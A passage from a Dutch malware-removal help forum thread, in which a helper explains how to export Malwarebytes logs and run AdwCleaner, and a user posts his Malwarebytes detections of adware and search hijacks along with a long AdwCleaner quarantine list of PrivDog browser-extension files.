Na herstart van de PC, indien Malwarebytes heeft gevraagd om de PC opnieuw op te starten, open Malwarebytes opnieuw.

Klik op de Historie knop bovenaan in het menu.

Klik vervolgens op de optie programmalogboeken en selecteer het Scanlogboek dat je wilt exporteren.

Dit is de laatste scan die je hebt gedaan (kan je zien aan de datum en tijd).

Selecteer deze om te bekijken.

In een nieuw venster dat zal openen zal je de resultaten van je scan zien.

Onderaan, selecteer ofwel om te exporteren als tekstbestand en geef het tekstbestand een naam, bijvoorbeeld mbamlog.

Ofwel kan je selecteren om te kopieren naar het klembord, zodat de inhoud van de log naar je klembord wordt gekopieerd en je die zo in je volgende post kan plakken.

---

Stap 2:

Controle op slechte toolbars...

Download AdwCleaner by Xplode naar je Bureaublad.

• 
  
• Sluit alle openstaande vensters
  
• Start AdwCleaner
  
• Klik op Scannen
  
• Klik op Verwijderen
  

Alle icoontjes verdwijnen van het Bureaublad,dit is normaal

Je PC word opnieuw opgestart en er een opent een logfile (C:\ AdwCleaner\AdwCleaner[xx].txt

Post deze inhoud hier op het Forum.

Enkel de log na de "Verwijderen" optie heb ik nodig.

Vergeet niet om je "smileys" uit te schakelen.

Als je Startpagina ook gehijackt was,stel dan de zoekmachine opnieuw in.

Deze word standaard door AdwCleaner terug gezet naar Google.com

[Jordan99]

alwarebytes Anti-Malware

www.malwarebytes.org

Scandatum: 30-11-2014

Scantijd: 6:10:26

Logbestand: malwarebite 30-11-2014.txt

Beheerder: Ja

Versie: 2.00.3.1025

Malwaredatabase: v2014.11.30.02

Rootkitdatabase: v2014.11.29.01

Licentie: Gratis

Malwarebescherming: Uitgeschakeld

Kwaadaardige Website Bescherming: Uitgeschakeld

Zelfbescherming: Uitgeschakeld

Besturingssysteem: Windows 7 Service Pack 1

Processor: x64

Bestandssysteem: NTFS

Gebruiker: Jordan

Scantype: Bedreigingsscan

Resultaat: Voltooid

Objecten Gescand: 322974

Verstreken Tijd: 4 u, 12 m, 57 s

Geheugen: Ingeschakeld

Opstarten: Ingeschakeld

Bestandssysteem: Ingeschakeld

Archieven: Ingeschakeld

Rootkits: Ingeschakeld

Heuristiek: Ingeschakeld

POP: Waarschuwen

POA: Ingeschakeld

Processen: 0

(Geen kwaadaardige items gedetecteerd)

Modules: 0

(Geen kwaadaardige items gedetecteerd)

Registersleutels: 1

PUP.Optional.WebSearchInfo, HKU\S-1-5-21-4250213819-786104705-630478919-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}, , [2d5e59e8aad2f83e049d5c488d775ba5],

Registerwaardes: 1

PUP.Optional.WebSearchInfo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES|DefaultScope, {BB74DE59-BC4C-4172-9AC4-73315F71CFFE}, , [2d5e44fdb6c670c6c282febc10f432ce]

Registerdata: 1

PUP.Optional.SearchFix.A, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN|Start Page, http://websearch.searchfix.info/?unqvl=63&idate=2014/11/25, Goed: (www.google.com), Slecht: (http://websearch.searchfix.info/?unqvl=63&idate=2014/11/25),,[4e3d88b97ffdb38353eefb541fe649b7]

Mappen: 1

PUP.Optional.BuyNSave.A, C:\Program Files (x86)\BuyNsave, , [b0dbb1908cf0092d625e56e9ff04629e],

Bestanden: 3

PUP.Optional.BuyNSave.A, C:\Program Files (x86)\BuyNsave\vBKaHnwe1rnDZN.dat, , [b0dbb1908cf0092d625e56e9ff04629e],

PUP.Optional.SearchFix.A, C:\Users\Jordan\AppData\Roaming\Mozilla\Firefox\Profiles\aksqjff7.default\prefs.js, Goed: (), Slecht: (user_pref("browser.startup.homepage", "http://websearch.searchfix.info/?unqvl=63&idate=2014/11/25"), ,[a6e52819572562d41953f39db5505ba5]

PUP.Optional.SearchFix.A, C:\Users\Jordan\AppData\Roaming\Mozilla\Firefox\Profiles\aksqjff7.default\prefs.js, Goed: (), Slecht: (user_pref("keyword.URL", "http://websearch.searchfix.info/?unqvl=63&idate=2014/11/25&l=1&q="), ,[dcaf69d8cab275c177f7b5db0500f30d]

Fysieke Sectoren: 0

(Geen kwaadaardige items gedetecteerd)

(end)

C:\ProgramData\13031386700010600142\cd5b15e575e1c3d03e6999ee334c64eb.ini->C:\AdwCleaner\Quarantine\C\ProgramData\13031386700010600142\cd5b15e575e1c3d03e6999ee334c64eb.ini.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\manifest.json->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\manifest.json.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\privdog\ui\options.html->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\privdog\ui\options.html.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\privdog\ui\panel.html->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\privdog\ui\panel.html.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\background.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\background.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\backgroundHandlers.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\backgroundHandlers.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\backgroundSession.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\backgroundSession.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\backgroundUtils.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\backgroundUtils.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\bing.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\bing.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\configLoader.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\configLoader.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\content.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\content.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\contentHandlers.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\contentHandlers.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\contentSession.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\contentSession.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\contentUtils.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\contentUtils.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\contextMenu.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\contextMenu.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\demon.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\demon.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\infoLookup.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\infoLookup.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\localConfig.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\localConfig.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\messaging.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\messaging.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\options.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\options.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\panel.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\panel.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\panelPre.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\panelPre.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\privdogrequest_module.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\privdogrequest_module.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\process.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\process.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\retargeting_module.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\retargeting_module.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\salsita.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\salsita.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\scriptInjector.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\scriptInjector.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\scriptLoader.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\scriptLoader.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\serpInjector.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\serpInjector.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\userPrefs.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\userPrefs.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\webRequestInspector.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\webRequestInspector.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\schemas\lookupRequest.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\schemas\lookupRequest.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\schemas\lookupResponse.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\schemas\lookupResponse.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\models\lookupRequest.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\models\lookupRequest.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\models\lookupResponse.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\models\lookupResponse.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\backbone-schema.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\backbone-schema.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\backbone.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\backbone.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\backgroundDispatch.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\backgroundDispatch.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\cajon.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\cajon.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\events.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\events.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\jquery.cookie.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\jquery.cookie.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\jquery.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\jquery.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\jsv.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\jsv.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\require.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\require.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\require_sync.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\require_sync.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\sax.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\sax.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\stacktrace.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\stacktrace.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\underscore.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\underscore.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\uri.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\frameworks\uri.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\arrow.png->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\arrow.png.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\background.jpg->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\background.jpg.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\button-icon-activate-all.png->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\button-icon-activate-all.png.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\button-icon-deactivate-all.png->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\button-icon-deactivate-all.png.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\icon-128.png->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\icon-128.png.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\icon-16.png->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\icon-16.png.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\icon-19.png->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\icon-19.png.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\icon-48.png->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\icon-48.png.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\infobubblearrow.png->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\infobubblearrow.png.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\left-arrow-black.png->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\left-arrow-black.png.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\left-arrow-green.png->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\left-arrow-green.png.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\left-arrow-red.png->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\left-arrow-red.png.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\left-arrow.png->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\left-arrow.png.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\logo-panel.png->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\logo-panel.png.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\logo.jpg->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\logo.jpg.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\logo.png->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\logo.png.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\onoff.png->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\onoff.png.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\options-btn.png->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\options-btn.png.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\tab-button-border.png->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\tab-button-border.png.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\whitelist-bg.png->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\whitelist-bg.png.vir

